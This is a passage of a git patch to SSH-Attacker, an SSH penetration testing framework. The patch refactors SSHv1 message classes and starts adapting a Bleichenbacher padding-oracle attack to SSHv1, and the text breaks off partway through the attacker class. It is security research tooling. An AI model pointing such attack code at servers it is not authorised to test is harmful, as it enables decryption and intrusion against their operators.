de.rub.nds.sshattacker.core.protocol.ssh1.serializer.SuccessMessageSerializier; import java.io.InputStream; -public class SuccessMessage extends SshMessage { +public class SuccessMessageSSH1 extends SshMessage { @Override public SuccessMessageHandler getHandler(SshContext context) { @@ -26,17 +26,17 @@ public SuccessMessageHandler getHandler(SshContext context) { } @Override - public SshMessageParser getParser(SshContext context, InputStream stream) { + public SshMessageParser getParser(SshContext context, InputStream stream) { return new SuccessMessageParser(context, stream); } @Override - public SshMessagePreparator getPreparator(SshContext context) { + public SshMessagePreparator getPreparator(SshContext context) { return new SuccessMessagePreparator(context.getChooser(), this); } @Override - public SshMessageSerializer getSerializer(SshContext context) { + public SshMessageSerializer getSerializer(SshContext context) { return new SuccessMessageSerializier(this); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/DisconnectMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/DisconnectMessageParser.java index 266e7c0d5..62700b366 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/DisconnectMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/DisconnectMessageParser.java @@ -11,12 +11,12 @@ import de.rub.nds.sshattacker.core.constants.HybridKeyExchangeCombiner; import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.DisconnectMessage; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.DisconnectMessageSSH1; import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class DisconnectMessageParser extends SshMessageParser { +public class DisconnectMessageParser extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); private HybridKeyExchangeCombiner combiner; private int agreementSize; @@ -90,12 +90,12 @@ public DisconnectMessageParser(SshContext context, InputStream stream) { this.combiner = combiner;*/ } - private void parseCRC(DisconnectMessage message) { + private void parseCRC(DisconnectMessageSSH1 message) { byte[] CRC = parseByteArrayField(4); LOGGER.debug("CRC: {}", ArrayConverter.bytesToHexString(CRC)); } - private void parseDisconnectReason(DisconnectMessage message) { + private void parseDisconnectReason(DisconnectMessageSSH1 message) { int lenght = parseIntField(4); String disconnectReason = parseByteString(lenght); message.setDisconnectReason(disconnectReason); @@ -131,10 +131,10 @@ private void parseDisconnectReason(DisconnectMessage message) { LOGGER.debug("Signature: " + message.getSignature()); }*/ - private void parseProtocolFlags(DisconnectMessage message) {} + private void parseProtocolFlags(DisconnectMessageSSH1 message) {} @Override - protected void parseMessageSpecificContents(DisconnectMessage message) { + protected void parseMessageSpecificContents(DisconnectMessageSSH1 message) { parseDisconnectReason(message); // parseCRC(message); @@ -150,7 +150,7 @@ protected HybridKeyExchangeReplyMessage createMessage() { */ @Override - public void parse(DisconnectMessage message) { + public void parse(DisconnectMessageSSH1 message) { parseProtocolMessageContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/FailureMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/FailureMessageParser.java new file mode 100644 index 000000000..1cd04873d --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/FailureMessageParser.java @@ -0,0 +1,33 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.parser; + +import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.FailureMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +import java.io.InputStream; + +public class FailureMessageParser extends SshMessageParser { + private static final Logger LOGGER = LogManager.getLogger(); + + public FailureMessageParser(SshContext context, InputStream stream) { + super(stream); + } + + @Override + protected void parseMessageSpecificContents(FailureMessageSSH1 message) {} + + @Override + public void parse(FailureMessageSSH1 message) { + parseProtocolMessageContents(message); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/SuccessMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/SuccessMessageParser.java index b34edec83..eb4552896 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/SuccessMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/parser/SuccessMessageParser.java @@ -9,12 +9,12 @@ import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageParser; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessage; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessageSSH1; import java.io.InputStream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class SuccessMessageParser extends SshMessageParser { +public class SuccessMessageParser extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); public SuccessMessageParser(SshContext context, InputStream stream) { @@ -22,10 +22,10 @@ public SuccessMessageParser(SshContext context, InputStream stream) { } @Override - protected void parseMessageSpecificContents(SuccessMessage message) {} + protected void parseMessageSpecificContents(SuccessMessageSSH1 message) {} @Override - public void parse(SuccessMessage message) { + public void parse(SuccessMessageSSH1 message) { parseProtocolMessageContents(message); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/DisconnectMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/DisconnectMessagePreparator.java index 5dd6fa50d..1013d5fa9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/DisconnectMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/DisconnectMessagePreparator.java @@ -12,26 +12,25 @@ import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; import de.rub.nds.sshattacker.core.crypto.keys.SshPublicKey; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.DisconnectMessage; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.DisconnectMessageSSH1; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class DisconnectMessagePreparator extends SshMessagePreparator { +public class DisconnectMessagePreparator extends SshMessagePreparator { private static final Logger LOGGER = LogManager.getLogger(); - private HybridKeyExchangeCombiner combiner; private SshPublicKey serverKey; - public DisconnectMessagePreparator( - Chooser chooser, DisconnectMessage message, HybridKeyExchangeCombiner combiner) { + public DisconnectMessagePreparator(Chooser chooser, DisconnectMessageSSH1 message) { super(chooser, message, MessageIdConstantSSH1.SSH_MSG_DISCONNECT); - this.combiner = combiner; } @Override public void prepareMessageSpecificContents() { LOGGER.debug("Preparring now..."); + getObject().setDisconnectReason("DummyValue"); + LOGGER.debug(getObject().getDisconnectReason().getValue()); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/FailureMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/FailureMessagePreparator.java new file mode 100644 index 000000000..6e6a176df --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/FailureMessagePreparator.java @@ -0,0 +1,30 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.preparator; + +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; +import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.FailureMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessageSSH1; +import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class FailureMessagePreparator extends SshMessagePreparator { + + private static final Logger LOGGER = LogManager.getLogger(); + + public FailureMessagePreparator(Chooser chooser, FailureMessageSSH1 message) { + super(chooser, message, MessageIdConstantSSH1.SSH_SMSG_FAILURE); + } + + @Override + public void prepareMessageSpecificContents() { + LOGGER.debug("Preparring now..."); + } +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/SuccessMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/SuccessMessagePreparator.java index ff681fa4f..85a018c4a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/SuccessMessagePreparator.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/preparator/SuccessMessagePreparator.java @@ -9,16 +9,16 @@ import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; import de.rub.nds.sshattacker.core.protocol.common.SshMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessage; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessageSSH1; import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class SuccessMessagePreparator extends SshMessagePreparator { +public class SuccessMessagePreparator extends SshMessagePreparator { private static final Logger LOGGER = LogManager.getLogger(); - public SuccessMessagePreparator(Chooser chooser, SuccessMessage message) { + public SuccessMessagePreparator(Chooser chooser, SuccessMessageSSH1 message) { super(chooser, message, MessageIdConstantSSH1.SSH_SMSG_SUCCESS); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/DisconnectMessageSerializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/DisconnectMessageSerializier.java index 089bb0bf0..500544fba 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/DisconnectMessageSerializier.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/DisconnectMessageSerializier.java @@ -7,19 +7,32 @@ */ package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; +import de.rub.nds.sshattacker.core.constants.DataFormatConstants; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.DisconnectMessage; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.DisconnectMessageSSH1; +import java.nio.charset.StandardCharsets; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class DisconnectMessageSerializier extends SshMessageSerializer { +public class DisconnectMessageSerializier extends SshMessageSerializer { private static final Logger LOGGER = LogManager.getLogger(); - public DisconnectMessageSerializier(DisconnectMessage message) { + public DisconnectMessageSerializier(DisconnectMessageSSH1 message) { super(message); } + private void serializeReason() { + LOGGER.debug("Description length: " + message.getDisconnectReason().getValue()); + appendInt( + message.getDisconnectReason().getValue().length(), + DataFormatConstants.STRING_SIZE_LENGTH); + LOGGER.debug("Description: " + message.getDisconnectReason().getValue()); + appendString(message.getDisconnectReason().getValue(), StandardCharsets.UTF_8); + } + @Override - public void serializeMessageSpecificContents() {} + public void serializeMessageSpecificContents() { + serializeReason(); + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/FailureMessageSerializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/FailureMessageSerializier.java new file mode 100644 index 000000000..6e7150d80 --- /dev/null +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/FailureMessageSerializier.java @@ -0,0 +1,26 @@ +/* + * SSH-Attacker - A Modular Penetration Testing Framework for SSH + * + * Copyright 2014-2022 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH + * + * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 + */ +package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; + +import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.FailureMessageSSH1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessageSSH1; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; + +public class FailureMessageSerializier extends SshMessageSerializer { + + private static final Logger LOGGER = LogManager.getLogger(); + + public FailureMessageSerializier(FailureMessageSSH1 message) { + super(message); + } + + @Override + public void serializeMessageSpecificContents() {} +} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/SuccessMessageSerializier.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/SuccessMessageSerializier.java index 47de4cc55..0c4472b5f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/SuccessMessageSerializier.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/ssh1/serializer/SuccessMessageSerializier.java @@ -8,15 +8,15 @@ package de.rub.nds.sshattacker.core.protocol.ssh1.serializer; import de.rub.nds.sshattacker.core.protocol.common.SshMessageSerializer; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessage; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessageSSH1; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; -public class SuccessMessageSerializier extends SshMessageSerializer { +public class SuccessMessageSerializier extends SshMessageSerializer { private static final Logger LOGGER = LogManager.getLogger(); - public SuccessMessageSerializier(SuccessMessage message) { + public SuccessMessageSerializier(SuccessMessageSSH1 message) { super(message); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java index 13b2d0b07..4d1f68dd3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java @@ -110,9 +110,9 @@ public void initTransportHandler(Context context) { } context.setTransportHandler( TransportHandlerFactory.createTransportHandler(context.getConnection())); - /* context.getTransportHandler() + context.getTransportHandler() .setResetClientSourcePort(config.isResetClientSourcePort()); - if (context.getTransportHandler() instanceof ClientTcpTransportHandler) { + /* if (context.getTransportHandler() instanceof ClientTcpTransportHandler) { ((ClientTcpTransportHandler) context.getTransportHandler()) .setRetryFailedSocketInitialization( config.isRetryFailedClientTcpSocketInitialization()); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java index 1cc81791d..8fbbc1869 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/MessageAction.java @@ -16,10 +16,7 @@ import de.rub.nds.sshattacker.core.protocol.authentication.message.*; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.protocol.connection.message.*; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ClientSessionKeyMessage; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessage; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.VersionExchangeMessageSSHV1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.*; import de.rub.nds.sshattacker.core.protocol.transport.message.*; import jakarta.xml.bind.annotation.XmlElement; import jakarta.xml.bind.annotation.XmlElementWrapper; @@ -174,7 +171,9 @@ public abstract class MessageAction extends ConnectionBoundAction { @XmlElement( type = ClientSessionKeyMessage.class, name = "ClientSessionKeyMessageSSH1"), - @XmlElement(type = SuccessMessage.class, name = "SuccessMessageSSH1") + @XmlElement(type = SuccessMessageSSH1.class, name = "SuccessMessageSSH1"), + @XmlElement(type = FailureMessageSSH1.class, name = "FailureMessageSSH1"), + @XmlElement(type = DisconnectMessageSSH1.class, name = "DisconnectMessageSSH1") }) protected List> messages = new ArrayList<>(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java index b33e38850..ec807aefa 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java @@ -14,10 +14,7 @@ import de.rub.nds.sshattacker.core.protocol.authentication.message.*; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.protocol.connection.message.*; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ClientSessionKeyMessage; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.SuccessMessage; -import de.rub.nds.sshattacker.core.protocol.ssh1.message.VersionExchangeMessageSSHV1; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.*; import de.rub.nds.sshattacker.core.protocol.transport.message.*; import de.rub.nds.sshattacker.core.state.State; import jakarta.xml.bind.annotation.XmlElement; @@ -164,7 +161,9 @@ public class ReceiveAction extends MessageAction implements ReceivingAction { @XmlElement( type = ClientSessionKeyMessage.class, name = "ClientSessionKeyMessageSSH1"), - @XmlElement(type = SuccessMessage.class, name = "SuccessMessageSSH1") + @XmlElement(type = SuccessMessageSSH1.class, name = "SuccessMessageSSH1"), + @XmlElement(type = FailureMessageSSH1.class, name = "FailureMessageSSH1"), + @XmlElement(type = DisconnectMessageSSH1.class, name = "DisconnectMessageSSH1") }) protected List> expectedMessages = new ArrayList<>(); From 0c2e04c9610affc094683a46680bf46e0c8cf787 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 15 Oct 2023 14:34:34 +0200 Subject: [PATCH 089/176] Implementing and correcting Bleichenbacher to work with SSHv1 Protocoll --- .../config/BleichenbacherCommandConfig.java | 1 + .../attacks/general/KeyFetcher.java | 29 +- .../attacks/impl/BleichenbacherAttacker.java | 263 ++++-------------- .../attacks/pkcs1/Bleichenbacher.java | 5 + .../BleichenbacherWorkflowGenerator.java | 71 +++++ .../pkcs1/oracles/BleichenbacherOracle.java | 137 +++++++++ 6 files changed, 291 insertions(+), 215 deletions(-) create mode 100644 Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/BleichenbacherWorkflowGenerator.java create mode 100644 Attacks/src/main/java/de/rub/nds/sshattacker/attacks/pkcs1/oracles/BleichenbacherOracle.java diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java index a82e7dcff..4369e630d 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/config/BleichenbacherCommandConfig.java @@ -63,6 +63,7 @@ public Config createConfig() { config.setWorkflowExecutorShouldClose(false); config.setProtocolVersion(ProtocolVersion.SSH1); config.setDefaultLayerConfiguration(LayerConfiguration.SSHV1); + config.setClientVersion("SSH-1.7-OpenSSH_6.2p1"); return config; } diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/general/KeyFetcher.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/general/KeyFetcher.java index a68b85511..6177d3f4d 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/general/KeyFetcher.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/general/KeyFetcher.java @@ -8,9 +8,12 @@ package de.rub.nds.sshattacker.attacks.general; import de.rub.nds.sshattacker.core.config.Config; +import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; import de.rub.nds.sshattacker.core.constants.ProtocolVersion; import de.rub.nds.sshattacker.core.constants.RunningModeType; +import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPublicKey; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; +import de.rub.nds.sshattacker.core.protocol.ssh1.message.DisconnectMessageSSH1; import de.rub.nds.sshattacker.core.protocol.ssh1.message.ServerPublicKeyMessage; import de.rub.nds.sshattacker.core.protocol.transport.message.RsaKeyExchangePubkeyMessage; import de.rub.nds.sshattacker.core.state.State; @@ -18,6 +21,7 @@ import de.rub.nds.sshattacker.core.workflow.WorkflowExecutor; import de.rub.nds.sshattacker.core.workflow.WorkflowTrace; import de.rub.nds.sshattacker.core.workflow.action.ReceiveAction; +import de.rub.nds.sshattacker.core.workflow.action.SendAction; import de.rub.nds.sshattacker.core.workflow.factory.WorkflowConfigurationFactory; import de.rub.nds.sshattacker.core.workflow.factory.WorkflowTraceType; import java.io.IOException; @@ -158,12 +162,14 @@ private static RSAPublicKey fetchRsaTransientKey( } } - public static List fetchRsaSsh1Keys(Config config) { + public static List fetchRsaSsh1Keys(Config config) { return fetchRsaSsh1Keys(config, 0, 5); } - public static List fetchRsaSsh1Keys(Config config, int attempt, int maxAttempts) { + public static List fetchRsaSsh1Keys( + Config config, int attempt, int maxAttempts) { WorkflowConfigurationFactory factory = new WorkflowConfigurationFactory(config); + LOGGER.debug("Fetchng keys"); WorkflowTrace trace = factory.createWorkflowTrace( @@ -172,6 +178,16 @@ public static List fetchRsaSsh1Keys(Config config, int attempt, in ReceiveAction receiveAction = new ReceiveAction(new ServerPublicKeyMessage()); trace.addSshAction(receiveAction); + DisconnectMessageSSH1 disconnectMessage = new DisconnectMessageSSH1(); + disconnectMessage.setDisconnectReason("cusIcan"); + + LOGGER.debug(disconnectMessage.getDisconnectReason()); + LOGGER.debug(disconnectMessage.toShortString()); + + disconnectMessage.setMessageId(MessageIdConstantSSH1.SSH_MSG_DISCONNECT.getId()); + SendAction disconnectAction = new SendAction(disconnectMessage); + trace.addSshAction(disconnectAction); + State state = new State(config, trace); WorkflowExecutor workflowExecutor = new DefaultWorkflowExecutor(state); @@ -199,11 +215,13 @@ public static List fetchRsaSsh1Keys(Config config, int attempt, in }*/ List> receivedMessages = receiveAction.getReceivedMessages(); + LOGGER.info(receivedMessages.size()); + LOGGER.info(receivedMessages.get(0).toString()); if (receivedMessages.size() > 0 && receivedMessages.get(0) instanceof ServerPublicKeyMessage) { - List rsaPublicKeys = new ArrayList<>(); + List rsaPublicKeys = new ArrayList<>(); rsaPublicKeys.add( ((ServerPublicKeyMessage) receivedMessages.get(0)) @@ -219,6 +237,11 @@ public static List fetchRsaSsh1Keys(Config config, int attempt, in String.format( "Did not receive PubkeyMessage in attempt %d, retrying...", attempt)); + try { + Thread.sleep(5000); + } catch (InterruptedException e) { + throw new RuntimeException(e); + } return fetchRsaSsh1Keys(config, attempt + 1, maxAttempts); } else { LOGGER.warn( diff --git a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java index ac98229ff..72d3a5995 100644 --- a/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java +++ b/Attacks/src/main/java/de/rub/nds/sshattacker/attacks/impl/BleichenbacherAttacker.java @@ -11,20 +11,16 @@ import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.attacks.config.BleichenbacherCommandConfig; -import de.rub.nds.sshattacker.attacks.exception.OracleUnstableException; import de.rub.nds.sshattacker.attacks.general.KeyFetcher; import de.rub.nds.sshattacker.attacks.general.ParallelExecutor; import de.rub.nds.sshattacker.attacks.general.Vector; import de.rub.nds.sshattacker.attacks.padding.VectorResponse; import de.rub.nds.sshattacker.attacks.padding.vector.FingerprintTaskVectorPair; import de.rub.nds.sshattacker.attacks.pkcs1.*; -import de.rub.nds.sshattacker.attacks.pkcs1.oracles.Ssh1MockOracle; +import de.rub.nds.sshattacker.attacks.pkcs1.oracles.BleichenbacherOracle; import de.rub.nds.sshattacker.attacks.response.EqualityError; -import de.rub.nds.sshattacker.attacks.response.EqualityErrorTranslator; -import de.rub.nds.sshattacker.attacks.response.FingerPrintChecker; import de.rub.nds.sshattacker.attacks.response.ResponseFingerprint; import de.rub.nds.sshattacker.attacks.task.FingerPrintTask; -import de.rub.nds.sshattacker.attacks.task.SshTask; import de.rub.nds.sshattacker.core.config.Config; import de.rub.nds.sshattacker.core.constants.KeyExchangeAlgorithm; import de.rub.nds.sshattacker.core.crypto.keys.CustomRsaPrivateKey; @@ -32,15 +28,10 @@ import de.rub.nds.sshattacker.core.exceptions.ConfigurationException; import de.rub.nds.sshattacker.core.state.State; import java.math.BigInteger; -import java.security.InvalidKeyException; -import java.security.NoSuchAlgorithmException; import java.security.interfaces.RSAPublicKey; import java.util.ArrayList; import java.util.Collections; -import java.util.LinkedList; import java.util.List; -import javax.crypto.NoSuchPaddingException; -import org.apache.logging.log4j.Level; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -71,8 +62,8 @@ public class BleichenbacherAttacker extends Attacker publicKeys = new ArrayList<>(); - private RSAPublicKey serverPublicKey, hostPublicKey; + private List publicKeys = new ArrayList<>(); + private CustomRsaPublicKey serverPublicKey, hostPublicKey; /** * @param bleichenbacherConfig Manger attack config @@ -100,166 +91,24 @@ public BleichenbacherAttacker( } /** + * Returns True, if the Sever is vulnerabily to Bleichenbacher`s attack, not implemented yet + * because of missing tests. + * * @return If the server is vulnerable to Bleichenbacher's attack or not */ @Override public Boolean isVulnerable() { - CONSOLE.info( - "A server is considered vulnerable to this attack if it reuses it's host key and " - + "responds differently to the test vectors."); - CONSOLE.info( - "A server is considered secure if it does not reuse the host key or" - + " if it does not have Manger's oracle."); - - RSAPublicKey publicKey = getServerPublicKey(); - if (publicKey == null) { - LOGGER.fatal("Could not retrieve PublicKey from Server - is the Server running?"); - throw new OracleUnstableException("Fatal Extraction error"); - } - - boolean reusesTransientPublicKey; - if (!isTransientKeyReused(publicKey)) { - CONSOLE.info("Server does not reuse the transient public key, it should be safe."); - reusesTransientPublicKey = false; - } else { - CONSOLE.info("Server reuses transient public key."); - reusesTransientPublicKey = true; - } - - return hasOracle() & reusesTransientPublicKey; + return hasOracle(); } /** - * Checks if the server has Bleichenbacher's oracle without checking if it reuses the transient - * public key + * Checks if the server has Bleichenbacher's oracle, is not implemented yed because of missing + * testcase. * * @return If the server has Bleichenbacher's oracle or not */ public boolean hasOracle() { - CONSOLE.info( - "A server has Manger's Oracle if it responds differently to the test vectors."); - - RSAPublicKey publicKey = getServerPublicKey(); - if (publicKey == null) { - LOGGER.fatal("Could not retrieve PublicKey from Server - is the Server running?"); - throw new OracleUnstableException("Fatal Extraction error"); - } - - EqualityError referenceError; - fullResponseMap = new LinkedList<>(); - for (int i = 0; i < config.getNumberOfIterations(); i++) { - List responseMap = createVectorResponseList(publicKey, true); - this.fullResponseMap.addAll(responseMap); - } - - referenceError = getEqualityError(fullResponseMap); - if (referenceError != EqualityError.NONE) { - CONSOLE.info( - "Found a behavior difference within the responses. The server has Manger's oracle."); - } else { - CONSOLE.info( - "Found no behavior difference within the responses. The server is very likely to not have Manger's oracle."); - } - - CONSOLE.info(EqualityErrorTranslator.translation(referenceError)); - if (referenceError != EqualityError.NONE - || LOGGER.getLevel().isMoreSpecificThan(Level.INFO)) { - LOGGER.debug("-------------(Not Grouped)-----------------"); - for (VectorResponse vectorResponse : fullResponseMap) { - LOGGER.debug(vectorResponse.toString()); - } - } - - resultError = referenceError; - return referenceError != EqualityError.NONE; - } - - /** - * @return Response vector list - */ - private List createVectorResponseList(RSAPublicKey publicKey, boolean plain) { - List taskList = new LinkedList<>(); - List> stateVectorPairList = new LinkedList<>(); - - List vectors; - if (plain) { - vectors = - Pkcs1VectorGenerator.generatePlainPkcs1Vectors( - publicKey.getModulus().bitLength(), getHashLength(), getHashInstance()); - } else { - vectors = - Pkcs1VectorGenerator.generatePkcs1Vectors( - publicKey, getHashLength(), getHashInstance()); - } - - for (Pkcs1Vector vector : vectors) { - - State state; - if (plain) { - state = - new State( - sshConfig, - MangerWorkflowGenerator.generateDynamicWorkflow( - sshConfig, vector.getPlainValue())); - } else { - state = - new State( - sshConfig, - MangerWorkflowGenerator.generateWorkflow( - sshConfig, vector.getEncryptedValue())); - } - - FingerPrintTask fingerPrintTask = - new FingerPrintTask( - state, - additionalTimeout, - increasingTimeout, - executor.getReexecutions(), - additionalTcpTimeout); - - taskList.add(fingerPrintTask); - stateVectorPairList.add(new FingerprintTaskVectorPair<>(fingerPrintTask, vector)); - } - List tempResponseVectorList = new LinkedList<>(); - executor.bulkExecuteTasks(taskList); - for (FingerprintTaskVectorPair pair : stateVectorPairList) { - ResponseFingerprint 